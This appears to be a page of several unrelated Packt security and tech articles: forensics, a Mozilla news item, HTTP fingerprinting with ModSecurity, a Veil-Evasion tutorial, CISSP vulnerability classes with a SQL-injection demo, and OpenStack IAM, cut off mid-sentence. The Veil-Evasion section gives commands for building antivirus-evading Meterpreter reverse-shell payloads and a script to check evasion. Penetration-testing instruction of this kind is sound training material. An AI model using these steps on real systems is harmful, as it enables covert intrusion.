An image showing the registration certificate of the company that was competing with XYZ Corp, providing the names of the directors
The address of the company in the registration certificate was the residential address of the sales manager of XYZ Corp
E-mail communications using personal e-mail addresses between the directors of the competing company and the senior manager sales of XYZ Corp
Further offline analysis showed that the sales manager's wife was related to the director of the competing company
It was also seen that the sales manager was connecting to the office Wi-Fi network using his Android phone
The sales manager was noted to be accessing cloud storage using his phone and transferring important files and contact lists
It was noted that the sales manager was also in close communication with a female employee in the accounts department and that the connection was intimate

The information collected so far was very indicative of the sales manager's involvement with competitors. Based on the preceding network forensics exercise, it was recommended that a full-fledged digital forensic exercise should be initiated, including that of his assigned laptop and phone device. It was also recommended that sufficient corroborating evidence should be collected using log analysis, RAM analysis, and disk forensics to initiate legal/breach of trust action against the suspect(s).

Summary

In this article, we moved our skills up a notch. You learned how to analyze the captured packets to see what is happening on the network. We also studied how to see the traffic from specific IP addresses as well as protocol-specific traffic. We also understood how to look for specific traffic based on keywords. Files, private credentials, and images have been examined to identify activities of interest. We have now become a lot better at investigating network activity.

Resources for Article:

Further resources on this subject:
Introduction to Mobile Forensics [article]
Securing vCloud Using the vCloud Networking and Security App Firewall [article]
Configuring the alerts [article]


Mozilla announces $3.5 million award for ‘Responsible Computer Science Challenge’ to encourage teaching ethical coding to CS graduates

Melisha Dsouza
11 Oct 2018
3 min read
Mozilla, along with Omidyar Network, Schmidt Futures, and Craig Newmark Philanthropies, has launched an initiative for professors, graduate students, and teaching assistants at U.S. colleges and universities to integrate ethics into undergraduate computer science education and demonstrate its relevance. This competition, titled the 'Responsible Computer Science Challenge', has been launched to foster the idea of 'ethical coding' in today's times. Code written by computer scientists is widely used in fields ranging from data collection to analysis. Poorly designed code can have a negative impact on a user's privacy and security. This challenge seeks creative approaches to integrating ethics and societal considerations into undergraduate computer science education. Ideas pitched by contestants will be judged by an independent panel of experts from academia, for-profit and non-profit organizations, and tech companies. The best proposals will be awarded up to $3.5 million over the next two years.

"We are looking to encourage ways of teaching ethics that make sense in a computer science program, that make sense today, and that make sense in understanding questions of data."
- Mitchell Baker, founder and chairwoman of the Mozilla Foundation

What is this challenge all about?

Professors are encouraged to tweak class material, for example, integrating a reading assignment on ethics to go with each project, or having computer science lessons co-taught with teaching assistants from the ethics department. The coursework introduced should encourage students to use their logical skills and come up with ideas to incorporate humanistic principles. The challenge consists of two stages: a Concept Development and Pilot Stage and a Spread and Scale Stage. The first stage will award winning proposals up to $150,000 to try out their ideas firsthand, for instance at the university where the educator teaches. The second stage will select the best of the pilots and grant them $200,000 to help them scale to other universities. Baker asserts that the competition and its prize money will yield substantial and relevant practical ideas. Ideas will be judged on the potential of their approach, the feasibility of success, their difference from existing solutions, their impact on society, the new perspectives they bring to ethics, and the scalability of the solution. Mozilla's competition comes as a welcome venture at a time when many top universities, like Harvard and MIT, are taking initiatives to integrate ethics into their computer science departments. To know all about the competition, head over to Mozilla's official blog. You can also check out the entire coverage of this story at Fast Company.

Mozilla drops "meritocracy" from its revised governance statement and leadership structure to actively promote diversity and inclusion
Mozilla optimizes calls between JavaScript and WebAssembly in Firefox, making it almost as fast as JS to JS calls
Mozilla's new Firefox DNS security updates spark privacy hue and cry


Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited:

The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted.
The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file.
Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities.
Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data.

HTTP fingerprinting

Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play. We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools:

httprint
One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD.

httprecon
This is a newer tool which was first released in 2007. It is still in active development. Runs on Windows.
Let's first run httprecon against a standard Apache 2.2 server: And now let's run httprint against the same server and see what happens: As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server! You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/.

Tip
If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname.

The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software.

How HTTP fingerprinting works

There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones.

Server banner

The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner:

# Change the server banner to MyServer 1.0
ServerTokens Full
SecServerSignature "MyServer 1.0"

Response header

The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges.

HTTP protocol responses

Another way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server.

Issuing an HTTP DELETE request

The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page? Here is a DELETE request issued to our Apache server:

$ nc bytelayer.com 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Mon, 27 Apr 2009 09:10:49 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method DELETE is not allowed for the URL /index.html.</p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

As we can see, the server returned a 405 - Method Not Allowed error.
The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL/index.html. Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net: $ nc www.iis.net 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedAllow: GET, HEAD, OPTIONS, TRACEContent-Type: text/htmlServer: Microsoft-IIS/7.0Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35GMT; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Mon, 27 Apr 2009 09:22:34 GMTConnection: closeContent-Length: 1293<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html ><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>405 - HTTP verb used to access this page is not allowed.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;}h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;}h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;fontfamily:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style>< /head><body><div id="header"><h1>Server Error</h1></div><div id="content"><div class="content-container"><fieldset> <h2>405 - HTTP verb used to access this page is not allowed.</h2> <h3>The page you are looking for cannot be displayed because aninvalid method (HTTP verb) was used to attempt access.</h3> </fieldset></div></div></body></html> The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0. (We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated from IIS carries the same HTTP error code, 405; however there are many subtle differences in the way the response is generated. Here are just a few: IIS uses spaces in between method names in the comma separated list for the Allow field, whereas Apache does not The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body Bad HTTP version numbers A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. 
Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued:

$ nc bytelayer.com 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Date: Mon, 27 Apr 2009 09:36:10 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Content-Length: 295
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br /></p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand. Now let's see what IIS does:

$ nc www.iis.net 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 27 Apr 2009 09:38:37 GMT
Connection: close
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Hostname</h2>
<hr><p>HTTP Error 400. The request hostname is invalid.</p>
</BODY></HTML>

We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol version would also require this header to be sent, and the error message reflects this fact.
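You can reproduce these probes yourself without httprint or httprecon. The following is a minimal sketch in Python (the target name is just a placeholder - point it at a server you are allowed to probe): it sends the same DELETE and bad-version requests over a raw socket and prints the status line, the header order, and the first line of the body, which are exactly the details the fingerprinting tools compare.

import socket

PROBES = {
    "DELETE": b"DELETE / HTTP/1.0\r\n\r\n",
    "BAD_VERSION": b"GET / HTTP/5.0\r\n\r\n",
}

def probe(host, port, raw_request):
    """Send a raw HTTP request and return the decoded response."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(raw_request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("iso-8859-1", errors="replace")

def summarize(response):
    """Print the status line, the order of the header fields, and the body start."""
    head, _, body = response.partition("\r\n\r\n")
    lines = head.split("\r\n")
    print("  status :", lines[0])
    print("  headers:", ", ".join(line.split(":", 1)[0] for line in lines[1:]))
    print("  body   :", body.strip().splitlines()[0] if body.strip() else "(empty)")

if __name__ == "__main__":
    target = "bytelayer.com"  # hypothetical target; substitute a host you may probe
    for name, request in PROBES.items():
        print(f"{name} probe against {target}:")
        summarize(probe(target, 80, request))

Running it against an Apache and an IIS host side by side makes the differences described above - the Allow formatting, the header order, and the error text - easy to spot by hand.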
Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.) A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which includes the following: It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python It can use Metasploit-generated shellcode It can integrate third-party tools such as Hyperion (encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory The Veil-Evasion_evasion.cna script allows for Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike Payloads can be generated and seamlessly substituted into all PsExec calls Users have the ability to reuse shellcode or implement their own encryption methods It's functionality can be scripted to automate deployment Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system) Veil-Evasion can generate an exploit payload; the standalone payloads include the following options: Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity. Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor. PowerShell shellcode injector. When the payloads have been created, they can be delivered to the target in one of the following two ways: Upload and execute using Impacket and PTH toolkit UNC invocation Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script. Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot: Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot: To obtain information on a specific payload, type info<payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload: The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack. 
The required options include the name of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot: In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot: The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot: The final screen displays information on the generated payload, as shown in the following screenshot: The exploit could also have been created directly from a command line using the following options: kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and it's behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!" Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows: Testing, thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system. 
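The checkvt lookup can also be approximated with a short script of your own. The following is a minimal sketch, assuming you have a VirusTotal API key exported as VT_API_KEY and that hashes.txt in ~/veil-output holds one hash per line with the hash as the first field (the exact layout may vary between Veil-Evasion releases); it only queries VirusTotal's existing report database and never uploads the payload itself.

import os
import time
import requests

API_URL = "https://www.virustotal.com/vtapi/v2/file/report"  # VirusTotal v2 hash lookup
API_KEY = os.environ["VT_API_KEY"]                            # assumed to be set by the tester
HASH_FILE = os.path.expanduser("~/veil-output/hashes.txt")

def lookup(payload_hash):
    """Ask VirusTotal for an existing report on this hash (no sample is uploaded)."""
    response = requests.get(API_URL, params={"apikey": API_KEY, "resource": payload_hash})
    response.raise_for_status()
    return response.json()

if __name__ == "__main__":
    with open(HASH_FILE) as handle:
        # the hash is assumed to be the first token on each non-empty line
        hashes = [line.split()[0] for line in handle if line.strip()]
    for payload_hash in hashes:
        report = lookup(payload_hash)
        if report.get("response_code") == 1:
            print(f"{payload_hash}: KNOWN to VirusTotal ({report.get('positives', 0)} detections)")
        else:
            print(f"{payload_hash}: no report found - payload has not been seen by VirusTotal")
        time.sleep(15)  # stay within the public API rate limit

As with checkvt, an unknown hash only means the payload has not been submitted to VirusTotal before; it is not a guarantee that the target's antivirus will miss it.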
Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]
CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks, have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility for penetration into the systems that may result in unauthorized access and a compromise of confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities while penetration tests are conducted to check the following: The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained The systems can be shut down or overloaded with malicious data using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation. Vulnerability assessment Vulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software are scanned in order to indentify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as variables and constants are not properly defined or checked. This can be compromised by supplying data which is greater than what the entity can hold. This results in a memory spill over into other areas and thereby corrupts the instructions or code that need to be processed by the microprocessor. When a vulnerability is exploited it results in a security violation, which will result in a certain impact. A security violation may be an unauthorized access, escalation of privileges, or denial-of-service to the IT systems. Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be a hardware-based or software application. Generally, vulnerabilities can be classified based on the type of security error. A type is a root cause of the vulnerability. Vulnerabilities can be classified into the following types: Access Control Vulnerabilities It is an error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource. Examples: Improper or no access control list or table No privilege model Inadequate file permissions Improper or weak encoding Security violation and impact: Files, objects, or processes can be accessed directly without authenticationor routing. Authentication Vulnerabilities It is an error due to inadequate identification mechanisms so that a user or a process is not correctly identified. 
Examples: Weak or static passwords Improper or weak encoding, or weak algorithms Security violation and impact: An unauthorized, or less privileged user (for example, Guest user), or a less privileged process gains higher privileges, such as administrative or root access to the system Boundary Condition Vulnerabilities It is an error due to inadequate checking and validating mechanisms such that the length of the data is not checked or validated against the size of the data storage or resource. Examples: Buffer overflow Overwriting the original data in the memory Security violation and impact: Memory is overwritten with some arbitrary code so that is gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system due to memory corruption may be exploited to get command prompt, or shell access, by injecting an arbitrary code Configuration Weakness Vulnerabilities It is an error due to the improper configuration of system parameters, or leaving the default configuration settings as it is, which may not be secure. Examples: Default security policy configuration File and print access in Internet connection sharing Security violation and impact: Most of the default configuration settings of many software applications are published and are available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges resulting in privilege escalation impacts. Exception Handling Vulnerabilities It is an error due to improper setup or coding where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions. Example: SQL Injection Security violation and impact: By injecting exceptional data, user credentials can be captured by an unauthorized entity Input Validation Vulnerabilities It is an error due to a lack of verification mechanisms to validate the input data or contents. Examples: Directory traversal Malformed URLs Security violation and impact: Due to poor input validation, access to system-privileged programs may be obtained. Randomization Vulnerabilities It is an error due to a mismatch in random data or random data for the process. Specifically, these vulnerabilities are predominantly related to encryption algorithms. Examples: Weak encryption key Insufficient random data Security violation and impact: Cryptographic key can be compromised which will impact the data and access security. Resource Vulnerabilities It is an error due to a lack of resources availability for correct operations or processes. Examples: Memory getting full CPU is completely utilized Security violation and impact: Due to the lack of resources the system becomes unstable or hangs. This results in a denial of services to the legitimate users. State Error It is an error that is a result of the lack of state maintenance due to incorrect process flows. Examples: Opening multiple tabs in web browsers Security violation and impact: There are specific security attacks, such as Cross-site scripting (XSS), that will result in user-authenticated sessions being hijacked. Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. 
Some such measures are applying patches supplied by the application vendors and hardening the systems.
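To make the input validation and exception handling categories more concrete, here is a minimal sketch in Python using the standard sqlite3 module and a hypothetical users table: the first lookup concatenates user input into the SQL text and is open to SQL injection, while the second applies a boundary check and a parameterized query, which is the kind of inexpensive countermeasure these vulnerability classes call for.

import sqlite3

def find_user_unsafe(conn, username):
    # Vulnerable: attacker-controlled input is concatenated into the SQL text,
    # so a value such as "x' OR '1'='1" changes the meaning of the query.
    query = "SELECT id, name FROM users WHERE name = '" + username + "'"
    return conn.execute(query).fetchall()

def find_user_safe(conn, username):
    # Countermeasure: validate the input length (boundary check) and pass the
    # value as a bound parameter so it can never be interpreted as SQL.
    if not isinstance(username, str) or len(username) > 64:
        raise ValueError("invalid username")
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (username,)
    ).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users (name) VALUES ('alice'), ('bob')")
    print(find_user_unsafe(conn, "x' OR '1'='1"))  # returns every row
    print(find_user_safe(conn, "x' OR '1'='1"))    # returns nothing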
How to secure a private cloud using IAM

Savia Lobo
10 May 2018
11 min read
In this article, we look at securing the private cloud using IAM. For IAM, OpenStack uses the Keystone project. Keystone provides the identity, token, catalog, and policy services, which are used specifically by OpenStack services. It is organized as a group of internal services exposed on one or many endpoints. For example, an authentication call validates the user and project credentials with the identity service. [box type="shadow" align="" class="" width=""]This article is an excerpt from the book,'Cloud Security Automation'. In this book, you'll learn how to work with OpenStack security modules and learn how private cloud security functions can be automated for better time and cost-effectiveness.[/box] Authentication Authentication is an integral part of an OpenStack deployment and so we must be careful about the system design. Authentication is the process of confirming a user's identity, which means that a user is actually who they claim to be. For example, providing a username and a password when logging into a system. Keystone supports authentication using the username and password, LDAP, and external authentication methods. After successful authentication, the identity service provides the user with an authorization token, which is further used for subsequent service requests. Transport Layer Security (TLS) provides authentication between services and users using X.509 certificates. The default mode for TLS is server-side only authentication, but we can also use certificates for client authentication. However, in authentication, there can also be the case where a hacker is trying to access the console by guessing your username and password. If we have not enabled the policy to handle this, it can be disastrous. For this, we can use the Failed Login Policy, which states that a maximum number of attempts are allowed for a failed login; after that, the account is blocked for a certain number of hours and the user will also get a notification about it. However, the identity service provided in Keystone does not provide a method to limit access to accounts after repeated unsuccessful login attempts. For this, we need to rely on an external authentication system that blocks out an account after a configured number of failed login attempts. Then, the account might only be unlocked with further side-channel intervention, or on request, or after a certain duration. We can use detection techniques to the fullest only when we have a prevention method available to save them from damage. In the detection process, we frequently review the access control logs to identify unauthorized attempts to access accounts. During the review of access control logs, if we find any hints of a brute force attack (where the user tries to guess the username and password to log in to the system), we can define a strong username and password or block the source of the attack (IP) through firewall rules. When we define firewall rules on Keystone node, it restricts the connection, which helps to reduce the attack surface. Apart from this, reviewing access control logs also helps to examine the account activity for unusual logins and suspicious actions, so that we can take corrective actions such as disabling the account. To increase the level of security, we can also utilize MFA for network access to the privileged user accounts. Keystone supports external authentication services through the Apache web server that can provide this functionality. 
Servers can also enforce client-side authentication using certificates. This will help to get rid of brute force and phishing attacks that may compromise administrator passwords. Authentication methods – internal and external Keystone stores user credentials in a database or may use an LDAP-compliant directory server. The Keystone identity database can be kept separate from databases used by other OpenStack services to reduce the risk of a compromise of the stored credentials. When we use the username and password to authenticate, identity does not apply policies for password strength, expiration, or failed authentication attempts. For this, we need to implement external authentication services. To integrate an external authentication system or organize an existing directory service to manage users account management, we can use LDAP. LDAP simplifies the integration process. In OpenStack authentication and authorization, the policy may be delegated to another service. For example, an organization that is going to deploy a private cloud and already has a database of employees and users in an LDAP system. Using this LDAP as an authentication authority, requests to the Identity service (Keystone) are transferred to the LDAP system, which allows or denies requests based on its policies. After successful authentication, the identity service generates a token for access to the authorized services. Now, if the LDAP has already defined attributes for the user such as the admin, finance, and HR departments, these must be mapped into roles and groups within identity for use by the various OpenStack services. We need to define this mapping into Keystone node configuration files stored at /etc/keystone/keystone.conf. Keystone must not be allowed to write to the LDAP used for authentication outside of the OpenStack Scope, as there is a chance to allow a sufficiently privileged Keystone user to make changes to the LDAP directory, which is not desirable from a security point of view. This can also lead to unauthorized access of other information and resources. So, if we have other authentication providers such as LDAP or Active Directory, then user provisioning always happens at other authentication provider systems. For external authentication, we have the following methods: MFA: The MFA service requires the user to provide additional layers of information for authentication such as a one-time password token or X.509 certificate (called MFA token). Once MFA is implemented, the user will have to enter the MFA token after putting the user ID and password in for a successful login. Password policy enforcement: Once the external authentication service is in place, we can define the strength of the user passwords to conform to the minimum standards for length, diversity of characters, expiration, or failed login attempts. Keystone also supports TLS-based client authentication. TLS client authentication provides an additional authentication factor, apart from the username and password, which provides greater reliability on user identification. It reduces the risk of unauthorized access when usernames and passwords are compromised. However, TLS-based authentication is not cost effective as we need to have a certificate for each of the clients. Authorization Keystone also provides the option of groups and roles. Users belong to groups where a group has a list of roles. All of the OpenStack services, such as Cinder, Glance, nova, and Horizon, reference the roles of the user attempting to access the service. 
OpenStack policy enforcers always consider the policy rule associated with each resource and use the user’s group or role, and their association, to determine and allow or deny the service access. Before configuring roles, groups, and users, we should document your required access control policies for the OpenStack installation. The policies must be as per the regulatory or legal requirements of the organization. Additional changes to the access control configuration should be done as per the formal policies. These policies must include the conditions and processes for creating, deleting, disabling, and enabling accounts, and for assigning privileges to the accounts. One needs to review these policies from time to time and ensure that the configuration is in compliance with the approved policies. For user creation and administration, there must be a user created with the admin role in Keystone for each OpenStack service. This account will provide the service with the authorization to authenticate users. Nova (compute) and Swift (object storage) can be configured to use the Identity service to store authentication information. For the test environment, we can have tempAuth, which records user credentials in a text file, but it is not recommended for the production environment. The OpenStack administrator must protect sensitive configuration files from unauthorized modification with mandatory access control frameworks such as SELinux or DAC. Also, we need to protect the Keystone configuration files, which are stored at /etc/keystone/keystone.conf, and also the X.509 certificates. It is recommended that cloud admin users must authenticate using the identity service (Keystone) and an external authentication service that supports two-factor authentication. Getting authenticated with two-factor authentication reduces the risk of compromised passwords. It is also recommended in the NIST guideline called NIST 800-53 IA-2(1). Which defines MFA for network access to privileged accounts, when one factor is provided by a separate device from the system being accessed. Policy, tokens, and domains In OpenStack, every service defines the access policies for its resources in a policy file, where a resource can be like an API access, it can create and attach Cinder volume, or it can create an instance. The policy rules are defined in JSON format in a file called policy.json. Only administrators can modify the service-based policy.json file, to control the access to the various resources. However, one has to also ensure that any changes to the access control policies do not unintentionally breach or create an option to breach the security of any resource. Any changes made to policy.json are applied immediately and it does not need any service restart. After a user is authenticated, a token 